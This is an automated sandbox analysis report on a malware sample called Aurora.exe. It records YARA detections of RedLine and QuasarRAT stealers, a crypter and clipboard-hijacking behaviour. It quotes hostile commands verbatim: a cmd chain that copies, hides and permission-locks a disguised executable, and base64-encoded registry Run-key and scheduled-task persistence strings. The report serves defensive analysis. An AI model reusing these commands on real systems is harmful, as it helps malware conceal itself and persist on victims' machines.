                      Source: OneDrive.exe, 00000007.00000002.1728900790.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000007.00000002.1728900790.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.1787802985.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is/
                      Source: powershell.exe, 0000000D.00000002.1782478788.00000000058EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1934227592.0000028FBF695000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2464311316.000002943ED02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: OneDrive.exe, 00000007.00000002.1728900790.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000007.00000002.1728900790.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.1787802985.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: OneDrive.exe, 00000007.00000002.1728900790.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000007.00000002.1728900790.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2933944946.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2933944946.0000000003077000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.1787802985.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: OneDrive.exe, 00000007.00000002.1728900790.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000007.00000002.1728900790.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.1787802985.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
                      Source: Aurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/aurora_botnet_support
                      Source: Aurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/cheshire_aurora
                      Source: vlc.exe, 00000013.00000002.1999343349.0000014C54370000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.sysinternals.com0
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeCode function: 1_2_00007FF6C12AB900 OpenMutexA,_dupenv_s,_invalid_parameter_noinfo_noreturn,free,GetModuleFileNameA,_invalid_parameter_noinfo_noreturn,RegCreateKeyA,RegSetValueExA,_invalid_parameter_noinfo_noreturn,system,_invalid_parameter_noinfo_noreturn,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CreateMutexA,Sleep,GetClipboardSequenceNumber,OpenClipboard,memmove,GlobalAlloc,memmove,EmptyClipboard,SetClipboardData,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,1_2_00007FF6C12AB900
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeCode function: 1_2_00007FF6C12AB900 OpenMutexA,_dupenv_s,_invalid_parameter_noinfo_noreturn,free,GetModuleFileNameA,_invalid_parameter_noinfo_noreturn,RegCreateKeyA,RegSetValueExA,_invalid_parameter_noinfo_noreturn,system,_invalid_parameter_noinfo_noreturn,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CreateMutexA,Sleep,GetClipboardSequenceNumber,OpenClipboard,memmove,GlobalAlloc,memmove,EmptyClipboard,SetClipboardData,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,1_2_00007FF6C12AB900
                      Source: C:\Users\user\AppData\Local\Msedge.exeCode function: 18_2_00007FF62B64B900 OpenMutexA,_dupenv_s,_invalid_parameter_noinfo_noreturn,free,GetModuleFileNameA,_invalid_parameter_noinfo_noreturn,RegCreateKeyA,RegSetValueExA,_invalid_parameter_noinfo_noreturn,system,_invalid_parameter_noinfo_noreturn,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CreateMutexExA,SleepEx,GetClipboardSequenceNumber,OpenClipboard,memmove,GlobalAlloc,memmove,EmptyClipboard,SetClipboardData,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,18_2_00007FF62B64B900
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeCode function: 1_2_00007FF6C12A6670 GetClipboardData,memmove,1_2_00007FF6C12A6670

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 7.2.OneDrive.exe.43d6b80.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.OneDrive.exe.46f41b0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.OneDrive.exe.46f41b0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.OneDrive.exe.43d6b80.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001F.00000002.1804400683.000000000466E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1727999189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.1824795418.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2933944946.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.2092621986.0000000002E4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.1787802985.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.1905772220.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1728900790.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000037.00000002.2078076863.0000000002C6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.1787802985.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000037.00000002.2085170193.00000000048DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1798111902.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1728900790.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: OneDrive.exe PID: 6972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7220, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: OneDrive Updater.exe PID: 7736, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7880, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: OneDrive Updater.exe PID: 8124, type: MEMORYSTR

                      System Summary

                      barindex
                      Source: 4.0.build.exe.5e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 4.0.build.exe.5e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 7.2.OneDrive.exe.43d6b80.1.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: 7.2.OneDrive.exe.43d6b80.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 7.2.OneDrive.exe.43d6b80.1.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                      Source: 7.2.OneDrive.exe.46f41b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: 7.2.OneDrive.exe.46f41b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 7.2.OneDrive.exe.46f41b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                      Source: 7.2.OneDrive.exe.46f41b0.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: 7.2.OneDrive.exe.46f41b0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 7.2.OneDrive.exe.46f41b0.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                      Source: 32.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: 32.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 32.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                      Source: 7.2.OneDrive.exe.43d6b80.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: 7.2.OneDrive.exe.43d6b80.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 7.2.OneDrive.exe.43d6b80.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                      Source: 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: Process Memory Space: build.exe PID: 6332, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: Aurora.exeStatic PE information: section name:
                      Source: Aurora.exeStatic PE information: section name:
                      Source: Aurora.exeStatic PE information: section name:
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                      Source: C:\Windows\System32\conhost.exeCode function: 57_2_00007FF6D68A3F40 NtCreateMutant,57_2_00007FF6D68A3F40
                      Source: C:\Users\user\Desktop\Aurora.exeCode function: 0_2_064309C80_2_064309C8
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeCode function: 1_2_00007FF6C12AB9001_2_00007FF6C12AB900
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeCode function: 1_2_00007FF6C12A10001_2_00007FF6C12A1000
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeCode function: 4_2_00E4E7B04_2_00E4E7B0
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeCode function: 4_2_00E4DC904_2_00E4DC90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_012EF03C17_2_012EF03C
                      Source: C:\Users\user\AppData\Local\Msedge.exeCode function: 18_2_00007FF62B64B90018_2_00007FF62B64B900
                      Source: C:\Users\user\AppData\Local\Msedge.exeCode function: 18_2_00007FF62B64100018_2_00007FF62B641000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD9BAD53A022_2_00007FFD9BAD53A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 32_2_0549F03C32_2_0549F03C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 56_2_0114F03C56_2_0114F03C
                      Source: C:\Windows\System32\conhost.exeCode function: 57_2_00007FF6D68B85C057_2_00007FF6D68B85C0
                      Source: C:\Windows\System32\conhost.exeCode function: 57_2_00007FF6D68B3DE057_2_00007FF6D68B3DE0
                      Source: C:\Windows\System32\conhost.exeCode function: 57_2_00007FF6D68B6D8057_2_00007FF6D68B6D80
                      Source: C:\Windows\System32\conhost.exeCode function: 57_2_00007FF6D68A719057_2_00007FF6D68A7190
                      Source: C:\Windows\System32\conhost.exeCode function: String function: 00007FF6D68A3F40 appears 34 times
                      Source: C:\Users\user\Desktop\Aurora.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1480
                      Source: vlc.exe.0.drStatic PE information: Number of sections : 11 > 10
                      Source: svchost.exe.19.drStatic PE information: Number of sections : 11 > 10
                      Source: Null.0.drStatic PE information: Number of sections : 23 > 10
                      Source: Null.0.drStatic PE information: No import functions for PE file found
                      Source: Null.0.drStatic PE information: Data appended to the last section found
                      Source: Aurora.exe, 00000000.00000002.1987273449.0000000002041000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs Aurora.exe
                      Source: Aurora.exe, 00000000.00000000.1667417417.00000000012B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAurorora.exe, vs Aurora.exe
                      Source: Aurora.exe, 00000000.00000002.1955656741.00000000012AB000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAurorora.exe, vs Aurora.exe
                      Source: Aurora.exe, 00000000.00000002.2065806666.00000000064A0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamerayrabbit.dll4 vs Aurora.exe
                      Source: Aurora.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 4.0.build.exe.5e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 4.0.build.exe.5e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 7.2.OneDrive.exe.43d6b80.1.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 7.2.OneDrive.exe.43d6b80.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 7.2.OneDrive.exe.43d6b80.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                      Source: 7.2.OneDrive.exe.46f41b0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 7.2.OneDrive.exe.46f41b0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 7.2.OneDrive.exe.46f41b0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                      Source: 7.2.OneDrive.exe.46f41b0.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 7.2.OneDrive.exe.46f41b0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 7.2.OneDrive.exe.46f41b0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                      Source: 32.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 32.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 32.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                      Source: 7.2.OneDrive.exe.43d6b80.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 7.2.OneDrive.exe.43d6b80.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 7.2.OneDrive.exe.43d6b80.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                      Source: 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: Process Memory Space: build.exe PID: 6332, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: OneDrive.exe.0.dr, Cronos-Crypter---------------.csBase64 encoded string: 'QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2NC4wLjMwMzE5XFJlZ0FzbS5leGU=', 'UmVtb3ZlIC1JdGVtUHJvcGVydHkgLVBhdGggJ0hLQ1U6XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFJ1bicgLU5hbWUgJw==', 'JztOZXctSXRlbVByb3BlcnR5IC1QYXRoICdIS0NVOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW4nIC1OYW1lICc=', 'IiAvc3QgMDA6MDAgL2R1IDk5OTk6NTkgL3NjIG9uY2UgL3JpIDYwIC9ybCBISUdIRVNUIC9m', 'IiAvc3QgMDA6MDAgL2R1IDk5OTk6NTkgL3NjIG9uY2UgL3JpIDYwIC9m'
                      Source: OneDrive Updater.exe.7.dr, Cronos-Crypter---------------.csBase64 encoded string: 'QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2NC4wLjMwMzE5XFJlZ0FzbS5leGU=', 'UmVtb3ZlIC1JdGVtUHJvcGVydHkgLVBhdGggJ0hLQ1U6XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFJ1bicgLU5hbWUgJw==', 'JztOZXctSXRlbVByb3BlcnR5IC1QYXRoICdIS0NVOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW4nIC1OYW1lICc=', 'IiAvc3QgMDA6MDAgL2R1IDk5OTk6NTkgL3NjIG9uY2UgL3JpIDYwIC9ybCBISUdIRVNUIC9m', 'IiAvc3QgMDA6MDAgL2R1IDk5OTk6NTkgL3NjIG9uY2UgL3JpIDYwIC9m'
                      Source: OneDrive Updater.exe.7.dr, Cronos-Crypter---------------.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: OneDrive Updater.exe.7.dr, Cronos-Crypter---------------.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: OneDrive.exe.0.dr, Cronos-Crypter---------------.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: OneDrive.exe.0.dr, Cronos-Crypter---------------.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@91/34@3/4
                      Source: C:\Users\user\Desktop\Aurora.exeFile created: C:\Users\user\AppData\Roaming\AdobeLicenseJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
                      Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\wqhuxjyrrhclgfix
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4192:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Msedge.exeMutant created: \Sessions\1\BaseNamedObjects\Sentise311
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Local\0cbdfe7f-0215-41e8-a7b5-d4fbbc555089
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brbwoi3y.qyo.ps1Jump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Aurora.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Aurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: Aurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: Aurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: Aurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: Aurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: Aurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: Aurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: unknownProcess created: C:\Users\user\Desktop\Aurora.exe "C:\Users\user\Desktop\Aurora.exe"
                      Source: C:\Users\user\Desktop\Aurora.exeProcess created: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe"
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /Q /C " ping localhost -n 1 && copy "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\user\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe" && icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe" && exit" && && exit "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Aurora.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe "C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe"
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
